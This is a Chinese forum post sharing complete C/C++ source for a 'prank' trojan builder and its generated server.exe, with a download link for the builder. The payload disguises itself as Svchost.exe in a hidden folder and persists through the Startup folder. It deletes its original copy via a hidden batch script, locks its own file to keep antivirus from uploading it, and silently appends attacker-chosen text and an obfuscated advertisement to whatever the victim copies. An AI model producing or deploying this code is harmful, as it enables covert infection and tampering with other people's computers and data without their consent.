主程序界面：

=============================================================================

程序介绍：

如果对方执行了主程序生成的【server.exe】，【server.exe】会自复制、自启动、自删除(仿木马)。

【server.exe】会后台每秒/次检测对方的剪切板，一有文本数据则在尾部加入【附加内容】，达到，对方粘贴

文本的时候，后面总是会多出一些数据。

例：如果附加内容为：“对！牛弹琴！”

对方 复制(Ctrl+C)一段：“对牛弹琴！”，当对方 粘贴(Ctrl+V)到某个地方时，内容就会变成

“对牛弹琴！对！牛弹琴！”。

【复制(Ctrl+C)粘贴(Ctrl+V)是使用率最高的操作之一，不愁对方不纠结，O(∩_∩)O哈哈~】

==============================================================================

子程序源码：

===============================================================================

#include

#include

#pragma comment(linker, "/OPT:NOWIN98")

char Dirr[256]="C:\\RECYCLER\\Svchost.exe"; // 释放路径

char L[99999]="   -------  网络编程爱好者  L、QQ：000000000";

char temp[499999999]={0};

char  tmp[499999999]={0};

HANDLE Lock_File,Lock_File1;

/*================================== 程序初始化 =======================================*/

/********************************************************/

//  开机自启动

/********************************************************/

void Auto(char Name[])

{

// 自复制到 启动文件夹 实现开机自启动  嫌麻烦 就用这种方式自启动吧 一句代码搞定

char DirName[]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\ts.exe";

unlink(DirName);

CopyFile(Name,DirName,1);

SetFileAttributes(DirName,FILE_ATTRIBUTE_HIDDEN);

Lock_File1=CreateFile(DirName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);

}

/********************************************************/

//  自删除功能

/********************************************************/

void Del(char *systemname)

{

FILE *fp;

fp=fopen("C:\\system.bat","w+");

fprintf(fp,"@echo off \n");

fprintf(fp,":statr\nif not exist \"%s\" goto done\n",systemname);

fprintf(fp,"del /f /q \"%s\" \n",systemname);

fprintf(fp,"goto statr\n");

fprintf(fp,":done\n");

fprintf(fp,"del /f /q %%0\n");

fclose(fp);

ShellExecute(NULL,"open","C:\\system.bat",0,0,SW_HIDE);

}

/********************************************************/

//  程序运行时进行初始化

/********************************************************/

void DelAdd()

{

char systemName[MAX_PATH];

char DirBuffer[MAX_PATH];

HMODULE hModule = GetModuleHandle(NULL);  // 获取当前程序句柄

GetModuleFileName(hModule,DirBuffer,sizeof(DirBuffer)); // 获取当前程序的路径

// GetSystemDirectory(systemName,sizeof(systemName)); // 获取系统文件夹路径

strcpy(systemName,Dirr);

if ((strcmp(DirBuffer,systemName))!=0)   // 判断程序自身是否在系统目录 不在则实现自删除

{

CopyFile(DirBuffer,systemName,0);

Del(DirBuffer);      // 自删除模块

SetFileAttributes(systemName,FILE_ATTRIBUTE_HIDDEN);

ShellExecute(NULL,"open",systemName,0,0,SW_HIDE); // 运行副本

exit(0); // 退出 让Bat删除自己

}

else

{

Auto(DirBuffer);

// 第一步 立即锁定本体 防止被上传 我想杀软没那么无聊为了上传就随随便便解锁吧？

Lock_File=CreateFile(DirBuffer, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);

}

}

/*================================== 程序初始化 =======================================*/

/*================================== 核心功能区 =======================================*/

/********************************************************/

//  检查剪切板数据的类型

/********************************************************/

int jc()

{

if (OpenClipboard(NULL))  // 打开剪切板

{

if (IsClipboardFormatAvailable(CF_TEXT)) // 检测剪切板是否有指定类型的剪切板数据

{

CloseClipboard(); // 关闭剪切板

return 1;

}

else

{

CloseClipboard(); // 关闭剪切板

return 0;

}

}

return 0;

}

/********************************************************/

//  读取剪切板数据

/********************************************************/

char* Rjqb()

{

if (OpenClipboard(NULL))  // 打开剪切板

{

if (IsClipboardFormatAvailable(CF_TEXT)) // 检测剪切板是否有指定类型的剪切板数据

{

HANDLE hClip;

char *pBuf;

hClip = GetClipboardData(CF_TEXT);  // 获取指定类型的剪切板数据

pBuf = (char *)GlobalLock(hClip); // 加锁

GlobalUnlock(hClip); // 解锁

CloseClipboard(); // 关闭剪切板

return pBuf;

}

else

CloseClipboard(); // 关闭剪切板

}

}

/********************************************************/

//  修改剪切板数据

/********************************************************/

void Wjqb()

{

if (OpenClipboard(NULL))  // 打开剪切板

{

if (IsClipboardFormatAvailable(CF_TEXT)) // 检测剪切板是否有指定类型的剪切板数据

{

HANDLE hClip;

char *pBuf;

EmptyClipboard(); // 清空剪切板 并释放剪切板中数据的句柄 把剪切板的所有权赋给当前窗口

hClip = GlobalAlloc(GMEM_MOVEABLE,strlen(temp)+1); // 分配一个内存对象 第二个参数 字节数

pBuf = (char *)GlobalLock(hClip); // 将空间加锁 并返回 指针

strcpy(pBuf,temp);

GlobalUnlock(hClip);  // 解锁

SetClipboardData(CF_TEXT,pBuf); // 写入数据

CloseClipboard(); // 关闭

strcpy(tmp,pBuf);

}

else

CloseClipboard(); // 关闭剪切板

}

}

/*================================== 核心功能区 =======================================*/

int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR     lpCmdLine,

int       nCmdShow)

{

// 已经加入锁定自身的功能 不需要下面的语句

/*

HANDLE _hEvent=CreateEvent(NULL,FALSE,FALSE,"Jqban");

if (_hEvent)

{

if(ERROR_ALREADY_EXISTS==GetLastError())

{

exit(0);

}

}

SetEvent(_hEvent);

*/

int cout=0;

//

// 让启动程序时的小漏斗马上消失

GetInputState();

PostThreadMessage(GetCurrentThreadId(),NULL,0,0);

MSG msg;

GetMessage(&msg, NULL, NULL, NULL);

//

char Bud[]="!!...!!矽描册赐悲荒粥!!MⅲRRせ211867767:";

int ii,jj=0;

ii=strlen(Bud)-1;

for(;ii>=0;ii--,jj++)

Bud[jj]=Bud[jj]-1;

DelAdd();

// 不停的循环

while (1)

{

if (jc())  //

{

// 读取剪切板 并复制给全局变量 temp

strcpy(temp,Rjqb());

// 比较是否与上次内容相同 若不相同则进行修改

if (strcmp(temp,tmp))

{

strcat(temp,L);

cout++;

if (cout==6)

{

strcat(temp,Bud);

cout=0;

}

// 在剪切板内容后面附加广告内容

Wjqb();  //  写入剪切板

}

}

Sleep(1000); // 延时1秒

}

return 0;

}

===============================================================================

至于主程序源码，主程序是用MFC创建的对话窗口，关键代码都在【生成】的按钮中

下面贴出【生成】按钮 触发的代码

===============================================================================

void CMyDlg::OnButtOk()

{

// TODO: Add your control notification handler code here

CString DIr;

CString MssG;

char autoo[]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\ts.exe";

char Dir[MAX_PATH]={0};

char Mssg[99999]={0};

GetDlgItemText(IDC_EDIT_DIR,DIr); // 获取 释放路径 的编辑框数据

GetDlgItemText(IDC_EDIT_Msg,MssG); // 获取 附加数据 的编辑框数据

strcpy(Dir,DIr);  // 必须用数组形式

strcpy(Mssg,MssG);

HRSRC hRc=FindResource(NULL,"L","Exe");

if(!hRc)

{

::MessageBox(0,"EXE资源不存在","错误",MB_SYSTEMMODAL);

return ;

}

HGLOBAL hg=LoadResource(NULL,hRc);  // 将资源载入内存并返回其在内存中首地址保存在hg中

DWORD dw=SizeofResource(NULL,hRc);  // 获得资源大小并用dw保存资源大小

// 分配缓冲区并用0填充

char a[137728];

memset(a,0,137728);

// 向该缓冲区中复制资源的二进制数据

memcpy(a,hg,dw); // 将资源的二进制数据存放在缓冲区a

// 创建服务端文件

FILE *out=fopen("server.exe","wb+");

fwrite(a,1,dw,out);

fclose(out);

FILE *fp=fopen("server.exe","rb+");

rewind(fp);

fseek(fp,0x6830,0);

fwrite(Dir,1,256,fp);

rewind(fp);  // 指针归0

fseek(fp,0x6930,0);

fwrite(Mssg ,1,99999,fp);

fclose(fp);

// 生成卸载相关的批处理...

char Fname[MAX_PATH];

GetFileTitle(Dir,Fname,sizeof(Fname));

fp=fopen("卸载.bat","w+");

fputs("echo off\n",fp);

fputs("title 卸载【整人小程序之剪切板】子程序  L、QQ：100\n",fp);

fputs("COLOR 0a\n",fp);

fputs("echo 此批处理，只能卸载子程序释放路径为：",fp);

fputs(Dir,fp);

fputs("\ntaskkill /F /IM \"",fp);

fputs(Fname,fp);

fputs("\"\nattrib -h \"",fp);

fputs(Dir,fp);

fputs("\"\nattrib -h \"",fp);

fputs(autoo,fp);

fputs("\"\n",fp);

fputs("Del \"",fp);

fputs(Dir,fp);

fputs("\"\ndel \"",fp);

fputs(autoo,fp);

fputs("\"\n",fp);

fputs("ECHO 执行完毕!\n",fp);

fputs("pause",fp);

fclose(fp);

::MessageBox(0,"已经生成服务端【server.exe】及卸载相关的批处理【卸载.exe】","成功",MB_SYSTEMMODAL);

}

=========================================================================================

主程序下载地址：

zrxcx-v1.0.zip

(38.54 KB, 下载次数: 3)

2015-1-11 00:47 上传

点击文件名下载附件

下载积分: 黑币 -5